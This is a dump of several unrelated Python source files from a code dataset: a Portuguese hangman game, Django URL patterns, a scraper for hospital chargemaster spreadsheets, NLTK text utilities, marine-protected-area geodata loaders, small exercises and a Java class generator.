print('''\n███▀▀▀██┼███▀▀▀███┼███▀█▄█▀███┼██▀▀▀\n██┼┼┼┼██┼██┼┼┼┼┼██┼██┼┼┼█┼┼┼██┼██┼┼┼\n██┼┼┼▄▄▄┼██▄▄▄▄▄██┼██┼┼┼▀┼┼┼██┼██▀▀▀\n██┼┼┼┼██┼██┼┼┼┼┼██┼██┼┼┼┼┼┼┼██┼██┼┼┼\n███▄▄▄██┼██┼┼┼┼┼██┼██┼┼┼┼┼┼┼██┼██▄▄▄\n┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼\n███▀▀▀███┼▀███┼┼██▀┼██▀▀▀┼██▀▀▀▀██▄┼\n██┼┼┼┼┼██┼┼┼██┼┼██┼┼██┼┼┼┼██┼┼┼┼┼██┼\n██┼┼┼┼┼██┼┼┼██┼┼██┼┼██▀▀▀┼██▄▄▄▄▄▀▀┼\n██┼┼┼┼┼██┼┼┼██┼┼█▀┼┼██┼┼┼┼██┼┼┼┼┼██┼\n███▄▄▄███┼┼┼─▀█▀┼┼─┼██▄▄▄┼██┼┼��┼┼██▄\n┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼██┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼██┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼████▄┼┼┼▄▄▄▄▄▄▄┼┼┼▄████┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼▀▀█▄█████████▄█▀▀┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼█████████████┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼██▀▀▀███▀▀▀██┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼██┼┼┼███┼┼┼██┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼█████▀▄▀█████┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼┼███████████┼┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼▄▄▄██┼┼█▀█▀█┼┼██▄▄▄┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼▀▀██┼┼┼┼┼┼┼┼┼┼┼██▀▀┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼▀▀┼┼┼┼┼┼┼┼┼┼┼▀▀┼┼┼┼┼┼┼┼┼┼┼''')\n#-----------FUNÇÃO RETORNO e PARÂMETRO-------\n#abaixo está o seletor de posição, resposável por escolher uma determinada palavra da lista\ndef posicao(a,b):\n aleatorio = randint(a,b)\n return aleatorio #irá retornar para posicao o valor de \"a\", essa variavel só vale aqui dentro\n\ndef tracinhos_e_dicas():\n print(\"dica: \",listaDicas[x])\n print(\" _\" * (len(escolhida)-1)) #Esse é apenas o print Inicial, antes do laço de repetição\n\noption = 0\nwhile option != 4:\n print('''Selecione a opção:\n--------------------------------\n1 - para jogar\n2 - para cadastrar\n3 - para listar\n4 - para sair\n--------------------------------\n''')\n option = int(input('Insira um Nº:'))\n if option == 1:\n #inicio do código da forca...\n\n listaPalavras = []\n listaDicas = []\n #inserindo palavras\n arq = open(\"arquivos/palavras.txt\",\"r\")\n conteudo = arq.readlines()\n for x in range(0,len(conteudo)):\n listaPalavras.append(conteudo[x])\n arq.close()\n #inserindo dicas\n arq = open(\"arquivos/dicas.txt\",\"r\")\n conteudo = arq.readlines()\n for x in range(0,len(conteudo)):\n listaDicas.append(conteudo[x])\n arq.close()\n\n\n\n reiniciar = \"s\"\n while reiniciar == \"s\":\n # abaixo é -1 porque a lista começa em 0, se não tiver o -1 vai passar o tanto de posições, aqui estou trabalhando com posições\n x = posicao(0, len(listaPalavras)-1) #transferi o valor da função para a variavel \"x\"---------<----------<--------<--------<-------<----<-\n #pega o valor de \"x\" e verifica na lista a palavra, estão guarda uma palavra em escolhida\n escolhida = listaPalavras[x] # o \"X\" refere-se a posição escolhida, no caso escolhe uma palavra da lista\n\n\n #listas vazias para armazenar dados\n descobertas = []\n digitadas = []\n\n #-1 por causa do bug da lista\n for c in range(0,len(escolhida)-1): #essa parte percorre cada letra da palavra escolhida aleatoriamente, uma palavra pode ser uma lista...\n descobertas.append(\"_\") #coloca traço na lista vazia de descobertas\n\n tracinhos_e_dicas() #exibe os tracinhos iniciais e a dicas...\n\n acertou = False\n erros = 0\n\n while acertou == False:\n acertos = 0\n print(\" \")\n letra = input(str(\"Dígite uma letra: \")).lower() #letra fica minúscula\n\n if letra in digitadas:\n print(\"Você já tentou essa letra !!\") #verifica se a letra ja foi digitada\n else:\n digitadas.append(letra) # a letra vai para a lista de digitadas, para evitar repetições\n print(\"--------------------------------\")\n print(\"Dica: \",listaDicas[x])\n\n for c in range(0, len(escolhida)-1): #-1 por causa do bug da lista\n if letra == escolhida[c]: #se alguma letra é igual a palavra da lista\"escolhida\"\n descobertas[c] = letra #substitui o tracinho de descoberta pela letra\n acertos+=1\n\n print(descobertas[c], end=' ')\n\n if acertos == 0: #contador de erros, se não tiver nenhum acerto na rodada, soma mais um erro\n erros+=1\n\n if erros == 1:\n erro1() #isso é uma função, relaciona com o desenho lá em cima\n elif erros == 2:\n erro2()\n elif erros == 3:\n erro3()\n elif erros == 4:\n erro4()\n elif erros == 5:\n erro5()\n elif erros == 6:\n erro6()\n if erros == 7:\n erro7()\n break #sai do laço de repetição para dar fim no jogo\n\n acertou = True # se chegou até aqui acertou fica TRUE\n for z in range(0, len(descobertas)):\n if descobertas[z] == \"_\":\n acertou = False #pula lá para cima se tiver algum tracinho ainda\n\n if erros < 7: #se o erro for < 7 dá o parabéns\n print(\" \")\n ganhou()\n\n reiniciar = str(input(\"Insira (s) para jogar novamente e (n) para sair: \")).lower()\n if reiniciar == \"n\":\n break #se o usuário escolher(2) sai do programa\n#Tela de cadastro\n if option == 2:\n print(\"------------Tela de Cadastro de palavras-----------------\")\n print(\" \")\n arq = open(\"arquivos/palavras.txt\",\"a\")#trabalha com aquivo txt.\n #escrevendo na variável arq\n palavraArq = input(\"informe a palavra a ser cadastrada: \")\n arq.writelines(palavraArq+\"\\n\") #cuidade com write e writelines\n #Salva as modificações e salva o arquivo\n arq.close()\n print(\" \")\n\n print(\"------------Tela de Cadastro de dicas-----------------\")\n print(\" \")\n arq = open(\"arquivos/dicas.txt\",\"a\")#trabalha com aquivo txt.\n #escrevendo na variável arq\n dicasArq = input(\"informe a dica a ser cadastrada: \")\n arq.writelines(dicasArq+\"\\n\") #cuidade com write e writelines\n #Salva as modificações e salva o arquivo\n arq.close()\n print(\" \")\n if option == 3:\n arq = open(\"arquivos/palavras.txt\",\"r\")\n conteudo = arq.readlines()\n for x in range(0,len(conteudo)):\n print(conteudo[x])\n arq.close()\n # if option == 4:\n # if option == 5:\n# .upper\n# listaPalavras = [\n# \"arvore\",\"casa\", \"mercedes\", \"fitness\", \"fortnite\", \"mustang\", \"zebra\",\"dinossauro\",\"laranja\",\"minecraft\"]\n# listaDicas = [\n# \"tem folhas...\",\"serve de abrigo...\", \"marca de carro...\", \"academia...\", \"um jogo battle royale...\", \"um muscle car...\", \"um animal...\",\"Um animal já extinto...\",\"Uma cor...\",\"Um jogo de construções...\"]\n","sub_path":"3 trimestre/parte 1/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"417921483","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . import views\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^list/$', views.list),\n url(r'^(.*)/weight/$', views.weight),\n url(r'^(.*)/$', views.detail),\n]\n","sub_path":"aircraft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13975650","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport requests\nimport urllib.error\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nimport os\nimport re\n\n\nclass Scraper(object):\n VALID_EXTENSIONS = ('.xlsx', '.xls', '.csv')\n ROOT_PATH = os.path.abspath(r'H:/oshpd_chargemasters/') # could be very large, so it's going on external HD\n\n URL_ROOT = 'https://oshpd.ca.gov/'\n URL_CHARGEMASTER = 'https://oshpd.ca.gov/data-and-reports/cost-transparency/hospital-chargemasters/{}-chargemasters/'\n\n YEAR_PATTERN = re.compile(r'/Chargemaster/(\\d{4})')\n HOSPITAL_PATTERN = re.compile(r'/Chargemaster/\\d{4}/(.*)/')\n FILENAME_PATTERN = re.compile(r'/Chargemaster/\\d{4}/.*/(.*)')\n\n def __init__(self, years=range(2011, 2020), start_index=70):\n \"\"\"\n\n :param years: Years to scrape\n :param start_index: The starting point for downloads\n \"\"\"\n self.years = years\n self.start_index = start_index\n self.url_by_year = {y: self.URL_CHARGEMASTER.format(y) for y in range(2011, 2020)}\n\n @staticmethod\n def download(url, file_path):\n urllib.request.urlretrieve(url, file_path)\n\n @staticmethod\n def _make_dir_if_new(dir_path):\n if not os.path.isdir(dir_path):\n os.mkdir(dir_path)\n\n def _dir_join_and_make(self, root, new):\n dir_path = os.path.join(root, new)\n self._make_dir_if_new(dir_path)\n return dir_path\n\n def download_all_chargemasters(self):\n for y in self.years:\n a_tags = self.get_link_tags_from_url_from_year(y)\n data_tags = a_tags[self.start_index:]\n download_urls = [self.URL_ROOT + tag['href'].replace('\\\\', '/').replace(' ', '%20') for tag in data_tags]\n\n for url in download_urls:\n filename, hospital, year = self.metadata_from_url(url)\n if filename is None:\n continue\n is_spreadsheet = any(extension in filename for extension in self.VALID_EXTENSIONS)\n\n if is_spreadsheet:\n dir_path_year = self._dir_join_and_make(self.ROOT_PATH, year)\n dir_path = self._dir_join_and_make(dir_path_year, hospital)\n file_path = os.path.join(dir_path, filename)\n\n self._try_download(file_path, filename, hospital, url, year)\n time.sleep(0.5)\n\n def get_link_tags_from_url_from_year(self, year):\n response = requests.get(self.url_by_year[year])\n html_response = BeautifulSoup(response.text, 'html.parser')\n a_tags = html_response.findAll('a')\n return a_tags\n\n def metadata_from_url(self, url):\n try:\n year = re.findall(self.YEAR_PATTERN, url)[0]\n hospital = re.findall(self.HOSPITAL_PATTERN, url)[0].replace('%20', '_')\n filename = re.findall(self.FILENAME_PATTERN, url)[0].replace('%20', '_')\n return filename, hospital, year\n except IndexError:\n return None, None, None\n\n def _try_download(self, file_path, filename, hospital, url, year):\n try:\n self.download(url, file_path)\n print(f'{year}, {hospital}, {filename}')\n except urllib.error.HTTPError:\n print(f'404 : {year}, {hospital}, {filename}')\n","sub_path":"scrape/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"196051405","text":"def lc(ny1,ni2):\n if ny1>ni2:\n a2=ny1\n else:\n a2=ni2\n while(True):\n if a2%ny1==0 and a2%ni2==0:\n l1=a2\n break\n a2=a2+1\n return l1\n \nny1,ni2=map(int,input().split())\nano=lc(ny1,ni2)\nprint(ano)\n\n\n\n\n\n","sub_path":"codekata/now.py","file_name":"now.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"355153833","text":"import inflect\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n# nltk.download('wordnet')\n\nengine = inflect.engine()\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\n\n\ndef remove_punctuation(text):\n translator = str.maketrans('', '', string.punctuation)\n text = text.translate(translator)\n return \" \".join(text.split())\n\n\ndef convert_number(text):\n temp_str = text.split()\n new_string = []\n for word in temp_str:\n if word.isdigit():\n temp = engine.number_to_words(word)\n new_string.append(temp)\n else:\n new_string.append(word)\n temp_str = ' '.join(new_string)\n return temp_str\n\n\ndef remove_stopwords(text):\n stop_words = stopwords.words('english')\n stop_words.remove('not')\n word_tokens = word_tokenize(text)\n filtered_text = [word for word in word_tokens if word not in stop_words]\n return filtered_text\n\n\ndef stem_and_lemmatize_word(word_tokens):\n word_tokens = [stemmer.stem(word) for word in word_tokens] # посмотреть результаты, возможно 1 убрать\n lemmas = [lemmatizer.lemmatize(word, pos='v') for word in word_tokens]\n return lemmas\n\n\ndef converter(array):\n array = [\" \".join(i) for i in array]\n return array\n\n\ndef split_array(array):\n array_split = []\n for i in array:\n array_split.append(i.split())\n return array_split\n","sub_path":"python/classifier/text/textUtils.py","file_name":"textUtils.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"159090479","text":"#Calcular la Diferencia en Días de Dos Fechas Dadas\n\nfrom datetime import date\n\nfecha_actual = date(2020,7,18)\notra_fecha = date(2021,7,18)\n\ndelta = otra_fecha-fecha_actual\nprint(delta) #365 days, 0:00:00\nprint(delta.days) #365\n","sub_path":"14-Calcular la Diferencia en Días de Dos Fechas Dadas.py","file_name":"14-Calcular la Diferencia en Días de Dos Fechas Dadas.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132679758","text":"from __future__ import print_function\nimport os, re, csv\nfrom django.contrib.gis.utils import LayerMapping\nfrom .models import MpaCandidate, mpacandidate_mapping\nfrom .models import Mpa, Contact, CandidateInfo\nfrom wdpa.models import WdpaPolygon, WdpaPoint\nfrom usmpa.models import USMpaPolygon\n\nfrom django.contrib.gis import geos, gdal\n\nfrom django.db import connection, transaction\n\nmpacandidate_shp = os.path.abspath(\n os.path.join(os.path.dirname(__file__), \"data/Potential_MPAs/Potential_MPAs.shp\")\n)\n\n\ndef import_candidates():\n cfilename = os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n \"data/Potential_MPAs/Candidate_MPAs_MPAtlas_20120523.csv\",\n )\n )\n cfile = open(cfilename, \"rU\")\n creader = csv.reader(cfile, csv.excel)\n line = -1\n for row in creader:\n line += 1\n if line == 0:\n continue\n name = row[1]\n lon = row[2]\n lat = row[3]\n\n print(name)\n\n mpa = Mpa.objects.get_or_create(name=name, status=\"Proposed\")[0]\n mpa.status = \"Proposed\"\n mpa.country = \"\"\n mpa.is_point = True\n try:\n lon = float(lon)\n lat = float(lat)\n point = geos.Point(lon, lat, srid=gdal.SpatialReference(\"WGS84\").srid)\n multipoint = geos.MultiPoint(\n point, srid=gdal.SpatialReference(\"WGS84\").srid\n )\n mpa.point_geom = multipoint\n mpa.point_geog = multipoint\n mpa.point_geom_smerc = multipoint.transform(3857)\n mpa.point_within = point\n except:\n print(\" ERROR: could not create point\")\n pass\n mpa.save()\n\n candidate = CandidateInfo.objects.get_or_create(mpa=mpa)[0]\n\n candidate.source = row[4]\n candidate.scope = row[5]\n candidate.basin = row[6]\n candidate.region = row[7]\n candidate.location = row[8]\n candidate.eez_or_highseas = row[9]\n candidate.lead_organization = row[10]\n candidate.partner_organizations = row[11]\n candidate.key_agency_or_leader = row[12]\n candidate.timeframe = row[13]\n candidate.current_protection = row[14]\n candidate.desired_protection = row[15]\n candidate.importance = row[16]\n candidate.opportunity = row[17]\n candidate.reference1 = row[18]\n candidate.reference1 = row[19]\n\n candidate.save()\n\n\ndef run_mpacandidate(strict=True, verbose=True, **kwargs):\n lm_mpacandidate = LayerMapping(\n MpaCandidate,\n mpacandidate_shp,\n mpacandidate_mapping,\n transform=False,\n encoding=\"iso-8859-1\",\n )\n lm_mpacandidate.save(strict=strict, verbose=verbose, **kwargs)\n\n\ndef wdpapoly2mpa():\n wpolys = (\n WdpaPolygon.objects.all()\n .defer(*WdpaPolygon.get_geom_fields())\n .order_by(\"wdpaid\")\n )\n count = 0\n for wpoly in wpolys:\n mpa, created = Mpa.objects.get_or_create(wdpa_id=wpoly.wdpaid)\n count += 1\n print(count)\n mpa.name = wpoly.name\n mpa.wdpa_id = wpoly.wdpaid\n mpa.country = wpoly.country\n mpa.sub_location = wpoly.sub_loc\n mpa.designation = wpoly.desig\n mpa.designation_eng = wpoly.desig_eng\n mpa.designation_type = wpoly.desig_type\n mpa.iucn_category = wpoly.iucn_cat\n mpa.int_criteria = wpoly.int_crit\n mpa.marine = wpoly.marine\n mpa.status = wpoly.status\n mpa.status_year = wpoly.status_yr\n mpa.area_notes = wpoly.area_notes\n mpa.rep_m_area = wpoly.rep_m_area\n mpa.calc_m_area = wpoly.gis_m_area\n mpa.rep_area = wpoly.rep_area\n mpa.calc_area = wpoly.gis_area\n mpa.gov_type = wpoly.gov_type\n mpa.mgmt_auth = wpoly.mang_auth\n mpa.mgmt_plan_ref = wpoly.mang_plan\n\n # mpa.geom_smerc = wpoly.geom_smerc\n # mpa.geom = wpoly.geom\n # mpa.geog = wpoly.geog\n\n mpa.save()\n\n # SQL update all geometry rows, much faster than through django\n print(\"UPDATE geometry columns\")\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE mpa_mpa SET geog = w.geog FROM wdpa_wdpapolygon as w WHERE mpa_mpa.wdpa_id = w.wdpaid\"\n )\n transaction.commit_unless_managed()\n print(\"UPDATE complete\")\n\n Mpa.set_all_geom_from_geog()\n\n\ndef wdpapoint2mpa():\n wpoints = WdpaPoint.objects.all().order_by(\"wdpaid\")\n count = 0\n for wpoint in wpoints:\n try:\n mpa, created = Mpa.objects.get_or_create(wdpa_id=wpoint.wdpaid)\n except:\n mpa = Mpa() # create a new object if wpoint has no wdpaid\n print(\"wdpaid error\", wpoint.wdpaid, wpoint.pk)\n count += 1\n print(count)\n mpa.is_point = True\n mpa.name = wpoint.name\n mpa.wdpa_id = wpoint.wdpaid\n mpa.country = wpoint.country\n mpa.sub_location = wpoint.sub_loc\n mpa.designation = wpoint.desig\n mpa.designation_eng = wpoint.desig_eng\n mpa.designation_type = wpoint.desig_type\n mpa.iucn_category = wpoint.iucn_cat\n mpa.int_criteria = wpoint.int_crit\n mpa.marine = wpoint.marine\n mpa.status = wpoint.status\n mpa.status_year = wpoint.status_yr\n mpa.rep_m_area = wpoint.rep_m_area\n mpa.rep_area = wpoint.rep_area\n mpa.gov_type = wpoint.gov_type\n mpa.mgmt_auth = wpoint.mang_auth\n mpa.mgmt_plan_ref = wpoint.mang_plan\n\n # mpa.point_geom_smerc = wpoint.point_geom_smerc\n # mpa.point_geom = wpoint.point_geom\n # mpa.point_geog = wpoint.point_geog\n\n mpa.save()\n\n # SQL update all geometry rows, much faster than through django\n print(\"UPDATE point geometry columns\")\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE mpa_mpa SET point_geog = w.geog FROM wdpa_wdpapoint as w WHERE mpa_mpa.wdpa_id = w.wdpaid\"\n )\n transaction.commit_unless_managed()\n print(\"UPDATE complete\")\n\n Mpa.set_all_geom_from_geog()\n\n\ndef usmpa2mpa(usmpa_id=None):\n usmpas = (\n USMpaPolygon.objects.all()\n .defer(*USMpaPolygon.get_geom_fields())\n .order_by(\"site_id\")\n )\n if usmpa_id is not None:\n usmpas = usmpas.filter(site_id=usmpa_id)\n count = 0\n for usmpa in usmpas:\n mpa, created = Mpa.objects.get_or_create(usmpa_id=usmpa.site_id)\n count += 1\n print(count, usmpa.site_name, usmpa.state, usmpa.site_id)\n mpa.name = usmpa.site_name\n mpa.long_name = usmpa.site_name\n mpa.short_name = usmpa.site_label\n mpa.usmpa_id = usmpa.site_id\n mpa.country = \"USA\"\n\n mpa.mgmt_auth = usmpa.mgmt_agency\n if usmpa.mgmt_plan and usmpa.mgmt_plan.lower() != \"no management plan\":\n mpa.mgmt_plan_type = usmpa.mgmt_plan\n mpa.mgmt_plan_ref = None\n mpa.gov_type = usmpa.gov_level\n\n statecode = re.compile(r\"^(\\D\\D)\\d*\")\n match = statecode.match(usmpa.site_id)\n if match:\n mpa.sub_location = match.group(1)\n print(\" \", mpa.sub_location)\n\n mpa.constancy = usmpa.constancy\n if usmpa.permanence == \"Permanent\":\n mpa.permanence = \"Permanent\"\n elif usmpa.permanence == \"Conditional\":\n mpa.permanence = \"Non-Permanent - Conditional\"\n elif usmpa.permanence == \"Temporary\":\n mpa.permanence = \"Non-Permanent - Temporary\"\n\n # mpa.designation = usmpa.desig\n # mpa.designation_eng = usmpa.desig_eng\n mpa.designation_type = \"National\"\n mpa.marine = True\n mpa.status = \"Designated\"\n\n if usmpa.establishment_year:\n mpa.status_year = int(usmpa.establishment_year)\n\n # mpa.protection_level\n\n if usmpa.primary_conservation_focus == \"Natural Heritage\":\n mpa.primary_conservation_focus == \"Biodiversity Protection\"\n elif usmpa.primary_conservation_focus == \"Sustainable Production\":\n mpa.primary_conservation_focus == \"Biomass Enhancement\"\n elif usmpa.primary_conservation_focus == \"Cultural Heritage\":\n mpa.primary_conservation_focus == \"Cultural Heritage\"\n else:\n mpa.primary_conservation_focus == \"Unknown\"\n\n confoci = usmpa.conservation_focus.split(\" and \")\n for i in range(0, len(confoci)):\n confocus = confoci[i]\n if confocus == \"Natural Heritage\":\n confocus == \"Biodiversity Protection\"\n elif confocus == \"Sustainable Production\":\n confocus == \"Biomass Enhancement\"\n elif confocus == \"Cultural Heritage\":\n confocus == \"Cultural Heritage\"\n else:\n confocus == \"Unknown\"\n if i == 0:\n mpa.secondary_conservation_focus = confocus\n else:\n tertiary_conservation_focus = confocus\n\n if usmpa.protection_focus == \"Ecosystem\":\n mpa.protection_focus = \"Ecosystem\"\n elif usmpa.protection_focus == \"Focal Resource\":\n mpa.protection_focus = \"Focal Species\"\n\n if usmpa.fishing_restriction == \"No Site Restrictions\":\n mpa.fishing = \"Yes\"\n elif (\n usmpa.fishing_restriction\n == \"Commercial and Recreational Fishing Prohibited\"\n ):\n mpa.fishing = \"No\"\n elif usmpa.fishing_restriction == \"Restrictions Unknown\":\n mpa.fishing = \"Unknown\"\n else:\n mpa.fishing = \"Some Restrictions\"\n mpa.fishing_info = usmpa.fishing_restriction\n\n if usmpa.vessel == \"Prohibited\":\n mpa.access = \"No\"\n elif usmpa.vessel == \"Restricted\":\n mpa.access = \"Restricted\"\n elif usmpa.vessel == \"Unrestricted\":\n mpa.access = \"Yes\"\n\n # Create a contact and url for this site\n c, created = Contact.objects.get_or_create(\n agency=usmpa.site_label + \" Website\", url=usmpa.url\n )\n # c.mpa_main_set.add(mpa)\n mpa.contact = c\n\n # mpa.geom_smerc = wpoly.geom_smerc\n # mpa.geom = wpoly.geom\n # mpa.geog = wpoly.geog\n\n mpa.save()\n\n # SQL update all geometry rows, much faster than through django\n print(\"UPDATE geometry columns\")\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE mpa_mpa SET geom = u.geom, geog = u.geog, geom_smerc = u.geom_smerc FROM usmpa_usmpapolygon as u WHERE mpa_mpa.usmpa_id = u.site_id\"\n )\n transaction.commit_unless_managed()\n print(\"UPDATE complete\")\n\n Mpa.set_all_geom_from_geog()\n","sub_path":"mpa/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":10550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"219000507","text":"def Is():\n return input()\n\n\ndef Iss():\n return input().split()\n\n\ndef Ii():\n return int(input())\n\n\ndef Iis():\n return map(int, input().split())\n\n\ndef Iil():\n return list(map(int, input().split()))\n\n\ndef Ixy(N):\n return [list(map(int, input().split())) for l in range(N)]\n\n\ndef Ixyind(N):\n xy = [map(int, input().split()) for _ in range(N)]\n return [list(i) for i in zip(*xy)]\n\n\ndef Imixind(N):\n list = []\n for i in range(N):\n a, b = input().split()\n list.append([int(a), b])\n return list\n\n\n#####################################################################\nimport sys\n\nsys.setrecursionlimit(100000)\n# N = Ii()\n# S = Is()\nN, Q = Iis()\n# l = Iil()\n# X,Y = Ixyind(N)\n# XY = Ixy(N)\n\n\nclass Node:\n def __init__(self):\n self.parents = []\n self.children = []\n self.depth = None\n\n\ndef cal_depth(node_id, d=0):\n Tree[node_id].depth = d\n for child in Tree[node_id].children:\n if Tree[child].depth == None:\n cal_depth(child, d + 1)\n for parent in Tree[node_id].parents:\n if Tree[parent].depth == None:\n cal_depth(parent, d - 1)\n\n\nTree = [Node() for _ in range(N)]\n\nfor i in range(N - 1):\n #id, 子供の数k, c_0~c_k\n tree_info = list(map(int, input().split()))\n node_id = tree_info[0] - 1\n k = 1\n\n if k > 0:\n children = tree_info[1] - 1\n Tree[node_id].children.append(children)\n Tree[node_id].type = \"internal node\"\n else:\n Tree[node_id].type = \"leaf\"\n\n for child in Tree[node_id].children:\n Tree[child].parents.append(node_id)\n\n#search_root\nroot_id = [i for i, t in enumerate(Tree) if t.parents == []][0]\nTree[root_id].type = \"root\"\ncal_depth(root_id)\n\n# answer_output\n# for i, t in enumerate(Tree):\n# print(\"node {}: parents = {}, depth = {}, {}\".format(i, t.parents, t.depth, t.children))\nfor _ in range(Q):\n c, d = Iis()\n c -= 1\n d -= 1\n if Tree[c].depth % 2 == Tree[d].depth % 2:\n print(\"Town\")\n else:\n print(\"Road\")\n","sub_path":"src/data/570.py","file_name":"570.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"382121256","text":"Information=\"\"\"\r\n/***\r\nAutomates the basic Writing of a Java Class\r\nAuthor: Liam Johnston\r\nDate: 10/13/2016\r\nInfo: When you are done with instance fields enter a blank new instance ex:\r\nto print out the basic java class\r\nVersion 3.0 \r\n+Setters for variables\r\n+Infinite Variables\r\n-Alpabet\r\n***/\r\n\"\"\"\r\nimport time#Import the time module to slow down code so that it is possible to copy result\r\n#Defining Variables\r\ncn=input(\"\\n\\n\\nClass Name: \")#Asks the user for the name of the class\r\nprint(\"\\n\")#/n prints a space so that the user may visually see the change in request\r\n\r\n#it is used to store the type of the instance fields\r\nglobal it#makes a variable global so that all methods can use it\r\n#Similar to private String it; minus the String part that is definited next\r\nglobal int_name#int_name keeps the names of the instance fields\r\nglobal counter\r\n\r\nit=\"\"#Defining the type that the it \r\nint_name=\"\"#Defining the fact that int_name is an empty String\r\ncounter=0 # used for limiting the number of loops to the amount of instance fields\r\n\r\n\r\n#Template is used to print the readable copied code\r\ndef Template(T1, T2, T3, U1):#Upon calling the Template method you need to define the\r\n#Name of the class, the types of the variables, the names of the variables, and a \r\n#number of the amount of instance fields\r\n #T1 ClassName, T2 Type, T3 Name, U1 number of instance fields\r\n print(Information)\r\n print(\"\\n\\n\",\"-\"*30,\"\\n\\n\")#Gives some elbow room\r\n print(\"public class \",T1,\"{\")\r\n print(\"//Instance Fields\")\r\n \r\n #Seperate the different types and names\r\n one_sep=T2.split()#All .Split does is makes sure that all the items in the String \r\n #name are seperate and different to help with later coding\r\n two_sep=T3.split()\r\n \r\n #backup_U1 = 0\r\n backup_U1 = U1#This is used for restoring the amount of \r\n #Instance fields so that the forevers only run for so long.\r\n pop = U1# I got lazy so I made a second one / I forgot about backup_U1\r\n #Prints the items in the list\r\n for item in T2.split():#For each number of types run this code\r\n U1 -= 1#Lowers the counter\r\n print(\"private\",one_sep[U1], two_sep[U1],\";\")#prints intial calling of class but not\r\n #just that but using the [] to save me lots of code\r\n \r\n U1 = backup_U1 #resets U1\r\n #Class Constructor\r\n print(\"//Class Constructor\")\r\n print(\"public\",T1,\"(\")\r\n \r\n ##Parameters of Constructor\r\n for item in T2.split():\r\n U1 -= 1\r\n print(one_sep[U1], two_sep[U1])\r\n if U1 > 0:\r\n print(\", \")\r\n U1 = backup_U1 #resets U1\r\n print(\")\")#End Parameters\r\n \r\n print(\"{\")\r\n #Sets constructed variables to the instance fields\r\n for item in T3.split():\r\n U1 -=1\r\n beeboop=\"this.\"+two_sep[U1]\r\n print(beeboop.replace(\" \",\"\"),\"=\" ,two_sep[U1],\";\")\r\n U1 = backup_U1 #resets U1\r\n print(\"}\")\r\n extra_U2=U1\r\n #getters\r\n for item in T3.split():\r\n U1 -=1\r\n get= \"get\"+two_sep[U1].title()\r\n print(\"public\",one_sep[U1], get.replace(\" \",\"\"),\"(){return\", two_sep[U1],\";}\")\r\n \r\n print(\"//Setters/n\")\r\n #Setters\r\n #T1 ClassName, T2 Type, T3 Name, U1 number of instance fields\r\n for item in T2.split():\r\n pop -= 1\r\n set= \" set\"+two_sep[pop].title()\r\n helping=\"public void\" +\" \"\r\n soup = \"(\"+ one_sep[pop] + \" \" + two_sep[pop] + \")\" +\"{\"\r\n kitchen = \"this.\"+two_sep[pop]\r\n print(helping + set.replace(\" \",\"\")+ soup)\r\n \r\n print(kitchen.replace(\" \",\"\")+\"=\"+two_sep[pop]+\";}\")#changes appropriate varibale to the given value\r\n if U1 > 0:\r\n print(\", \")\r\n \r\n print(\"}\")#End of Line\r\n #T1 ClassName, T2 Type, T3 Name, U1 number of instance fields\r\n \r\n#This code gets the information to use for Template()\r\nboolean=False\r\nwhile boolean==False:\r\n cmd=input(\"Instance Field Type: \")\r\n if cmd==\"\":\r\n boolean=True\r\n break\r\n CMD=input(\"Instance Field Name: \")\r\n it += cmd + \" \"\r\n int_name += CMD + \" \"\r\n counter = 1 + counter\r\n print(\"\\n\")\r\n#it = Type\r\n#int_name = instance name\r\n#counter = amount of instance fields\r\nTemplate(cn, it, int_name, counter)\r\ntime.sleep(60)\r\n","sub_path":"Java Class Writer_V3.py","file_name":"Java Class 